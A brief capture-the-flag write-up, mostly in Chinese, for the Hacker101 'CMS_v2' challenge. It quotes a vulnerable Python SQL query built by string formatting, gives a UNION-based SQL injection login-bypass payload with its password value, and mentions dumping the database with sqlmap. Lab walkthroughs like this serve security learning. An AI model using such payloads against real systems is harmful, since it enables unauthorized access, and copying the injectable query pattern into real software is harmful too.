CMS_v2

CMS_v2

https://ctf.hacker101.com/ctf/launch/3


Flag 1

if cur.execute('SELECT password FROM admins WHERE username=\'%s\'' % request.form['username'].replace('%', '%%')) == 0:

cur.execute:python执行数据库操作

数据库语句:

SELECT password FROM admins WHERE username=\'%s\'

查询password

字符处理

request.form['username'].replace('%', '%%')

用%%替代%处理username然后传入参数值

判断条件是

cur.execute == 0

username

admin'and '1'='2' union select 0 from admins

password

0

Flag 2

get–> post

Flag 3

flag1 是 password,但是username在哪里还没有找到

sqlmap直接把数据库dump出来,简单粗暴